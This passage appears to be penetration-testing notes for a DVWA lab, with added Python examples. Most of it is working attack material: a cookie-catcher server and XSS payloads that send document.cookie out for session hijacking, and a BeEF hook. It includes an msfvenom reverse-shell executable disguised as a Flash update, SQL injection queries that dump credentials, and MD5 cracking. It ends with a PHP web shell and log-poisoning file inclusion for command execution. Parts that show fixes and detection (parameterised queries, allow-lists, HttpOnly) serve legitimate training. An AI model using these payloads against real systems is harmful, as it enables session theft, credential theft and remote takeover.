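    raw = urllib.parse.unquote(query[len("cookie="):])
    cookies = {}
    for part in raw.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies


def hijack_cookie_header(cookies):
    """Cookie header value to replay the stolen session from the attacker's browser or curl."""
    return "; ".join(f"{name}={value}" for name, value in cookies.items())


class CookieCatcher(http.server.BaseHTTPRequestHandler):
    captured = []  # (victim address, Referer, cookies)

    def do_GET(self):
        cookies = parse_stolen_cookie(self.path)
        if cookies:
            referer = self.headers.get("Referer")
            self.captured.append((self.client_address[0], referer, cookies))
            print(f"[+] {self.client_address[0]} from {referer}: {hijack_cookie_header(cookies)}")
        self.send_response(204)  # empty reply, nothing is rendered in the victim's browser
        self.end_headers()

    def log_message(self, *args):
        pass  # keep stdout to the captures only


def serve(port=8080):
    http.server.HTTPServer(("0.0.0.0", port), CookieCatcher).serve_forever()


if __name__ == "__main__":
    serve()
```

Two practical notes: `document.location=` visibly sends the victim to the listener, so a quieter payload loads the same URL as an image (`new Image().src = "http://192.168.56.4:8080/steal?cookie=" + document.cookie`); and a session cookie set with the HttpOnly flag never appears in document.cookie, which is why that flag (together with a `Secure` attribute and a Content-Security-Policy) is the mitigation to recommend in the report.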


##### Stored XSS



1. Trigger a popup

In an input field, enter:

<script>alert("XSS")</script>

2. Hook the browser with BeEF

root@kali:/home/kali# beef-xss

<< set the password Anjay123! when prompted >>

Open the web UI: 127.0.0.1:3000/ui/login

Log in with user beef, password Anjay123!

In the stored XSS field enter:

<script src="http://192.168.56.4:3000/hook.js"></script>

Every browser that loads the stored page then appears under Online Browsers.

 

To deliver a payload to a hooked browser (for example posing as an Adobe Flash update), generate it, serve it over HTTP and keep a listener waiting for the shell:

$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.4 LPORT=8081 -f exe -o adobe_flash.exe

 

 $ python -m SimpleHTTPServer 8082

 $ nc -lnvp 8081

 

 

##### SQL Injection queries

 

 ' or 1=1 #

 ' order by 2#

 ' union select null, @@version#

 ' union select table_schema, table_name from information_Schema.tables#

' union select null, concat(table_schema, ":", table_name, ":", column_name) from information_schema.columns#

 ' union select user, password from dvwa.users#

' union select null, concat(user, ":", password) from dvwa.users#

 

Copy the result of the last query into a file

 

in the format:

 

 smithy:5f4dcc3b5aa765d61d8327deb882cf99

 

 nano dvwa-hash

 

$ /usr/sbin/john --format=RAW-MD5 dvwa-hash

 

Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist                                                                     

password         (admin)                                                                                                                  

password         (smithy)

abc123           (gordonb)

letmein          (pablo)

Proceeding with incremental:ASCII

charley          (1337)
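The whole chain above (bypass the WHERE clause, UNION out the user:hash pairs, crack the raw MD5 offline) in one runnable Python example, added here and not part of the original notes. It uses an in-memory SQLite copy of DVWA's users table so it runs offline; the five accounts and hashes are DVWA's defaults (the smithy line matches the one shown above), the wordlist is constructed. One difference from the MySQL payloads above: SQLite has no `#` comment, so the payloads end with `-- ` instead, which MySQL also accepts.

```python
import hashlib
import sqlite3

# Constructed copy of DVWA's users table: the five default accounts and their raw-MD5 hashes.
DVWA_USERS = [
    ("admin", "admin", "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    ("Gordon", "Brown", "gordonb", "e99a18c428cb38d5f260853678922e03"),
    ("Hack", "Me", "1337", "8d3533d75ae2c3966d7e0d4fcc69216b"),
    ("Pablo", "Picasso", "pablo", "0d107d09f5bbe40cade3de5c71e9e9b7"),
    ("Bob", "Smith", "smithy", "5f4dcc3b5aa765d61d8327deb882cf99"),
]

# Constructed wordlist; rockyou.txt or /usr/share/john/password.lst in practice.
WORDLIST = ["123456", "password", "letmein", "abc123", "monkey123", "charley", "qwerty"]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, "
               "last_name TEXT, user TEXT, password TEXT)")
    db.executemany("INSERT INTO users (first_name, last_name, user, password) VALUES (?, ?, ?, ?)",
                   DVWA_USERS)
    return db


def lookup_vulnerable(db, user_id):
    """DVWA-style query: the id parameter is pasted straight into the SQL string."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return db.execute(sql).fetchall()


def lookup_safe(db, user_id):
    """Same query with a bound parameter: whatever the input contains, it is only ever a value."""
    return db.execute("SELECT first_name, last_name FROM users WHERE user_id = ?",
                      (user_id,)).fetchall()


def dump_credentials(db):
    """UNION-based extraction, the equivalent of the last query above; returns {user: md5}."""
    payload = "' UNION SELECT user, password FROM users -- "
    return dict(lookup_vulnerable(db, payload))


def crack_raw_md5(creds, wordlist):
    """Offline cracking of raw MD5: hash every candidate once, then look each dumped hash up."""
    table = {hashlib.md5(word.encode()).hexdigest(): word for word in wordlist}
    return {user: table.get(h) for user, h in creds.items()}


if __name__ == "__main__":
    db = make_db()
    print("' or 1=1 -- returns", len(lookup_vulnerable(db, "' or 1=1 -- ")), "rows")
    print("same input, parameterised:", lookup_safe(db, "' or 1=1 -- "))
    for user, word in crack_raw_md5(dump_credentials(db), WORDLIST).items():
        print(f"{user}: {word or '<not in wordlist>'}")
```

The bound-parameter version is the fix to recommend; unsalted MD5 for passwords is the second finding, since every `password` user shares the hash 5f4dcc3b5aa765d61d8327deb882cf99 and a precomputed table cracks the whole dump at once.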



##### File upload vulnerability


1. Create backdoor.php:


```
<?php

system($_GET['cmd']);

?>
```


2. Upload backdoor.php through the upload form


3. Open the uploaded file in the browser with ?cmd=whoami appended:

http://192.168.56.120/dvwa/hackable/uploads/backdoor.php?cmd=whoami


##### File Inclusion


For example, with a URL like:


http://192.168.56.120/dvwa/vulnerabilities/fi/?page=include.php


change it to:


http://192.168.56.120/dvwa/vulnerabilities/fi/?page=/etc/passwd


If the output changes (the passwd file is shown), try including the SSH auth log:


http://192.168.56.120/dvwa/vulnerabilities/fi/?page=/var/log/auth.log


Now plant PHP in that log by attempting an SSH login whose username is the backdoor (any password will do; the inner quotes must be double quotes so the shell keeps the username intact):

ssh '<?php system($_GET["cmd"]); ?>'@192.168.56.120


If the page now shows the warning: Warning: system() [function.system]: Cannot execute a blank command in ...

the PHP from the log line is being executed (cmd was simply empty), so it works.


Then run: http://192.168.56.120/dvwa/vulnerabilities/fi/?page=/var/log/auth.log&cmd=more /etc/passwd


If the command output appears, we have command execution on the host through the included log.
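Both halves of the technique above, as an added Python example (not part of the original notes): why `include($_GET['page'])` accepts `/etc/passwd` at all, what the safe version of that lookup looks like, and a detection check for the poisoned sshd line. PAGE_DIR and the allow-list are assumed values standing in for DVWA's include directory; the two auth.log lines are constructed in OpenSSH's "Invalid user" / "Accepted password" format.

```python
import os
import re

PAGE_DIR = "/srv/dvwa/vulnerabilities/fi"  # assumed directory the page parameter should stay inside
ALLOWED_PAGES = {"include.php", "file1.php", "file2.php", "file3.php"}  # assumed allow-list


def resolve_page_vulnerable(page):
    """Mirrors include($_GET['page']): an absolute path or '..' traversal wins over PAGE_DIR."""
    return os.path.normpath(os.path.join(PAGE_DIR, page))


def resolve_page_safe(page):
    """Allow-list first, then confine the resolved path to PAGE_DIR as defence in depth."""
    if page not in ALLOWED_PAGES:
        raise ValueError(f"page not allowed: {page!r}")
    full = os.path.normpath(os.path.join(PAGE_DIR, page))
    if os.path.dirname(full) != PAGE_DIR:
        raise ValueError("path escapes the page directory")
    return full


# Constructed auth.log lines: the first is what sshd writes for the ssh '<?php ...>'@host trick.
POISONED_AUTH_LINE = ('Aug  5 02:40:12 metasploitable sshd[6420]: Invalid user '
                      '<?php system($_GET["cmd"]); ?> from 192.168.56.4')
CLEAN_AUTH_LINE = ('Aug  5 02:41:03 metasploitable sshd[6431]: Accepted password for msfadmin '
                   'from 192.168.56.4 port 53240 ssh2')

PHP_OPEN_TAG = re.compile(r"<\?(php\b|=)", re.IGNORECASE)


def find_log_poisoning(lines):
    """Detection: any auth.log line carrying a PHP open tag is a log-poisoning attempt for an LFI."""
    return [line for line in lines if PHP_OPEN_TAG.search(line)]


if __name__ == "__main__":
    for page in ("include.php", "/etc/passwd", "../../../../etc/passwd"):
        try:
            print(f"{page!r}: vulnerable -> {resolve_page_vulnerable(page)}, safe -> {resolve_page_safe(page)}")
        except ValueError as err:
            print(f"{page!r}: vulnerable -> {resolve_page_vulnerable(page)}, safe -> rejected ({err})")
    print("poisoned lines:", find_log_poisoning([POISONED_AUTH_LINE, CLEAN_AUTH_LINE]))
```

`os.path.join` discards everything before an absolute second argument, which is exactly the behaviour of PHP's `include` with a user-supplied path; the allow-list is the real fix, and the poisoning detector is what a blue team would run over auth.log (and the web server's access log) after such a finding.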



##### Antivirus bypass: one method is to generate the backdoor in PowerShell format (as done above with msfvenom -f psh-cmd)
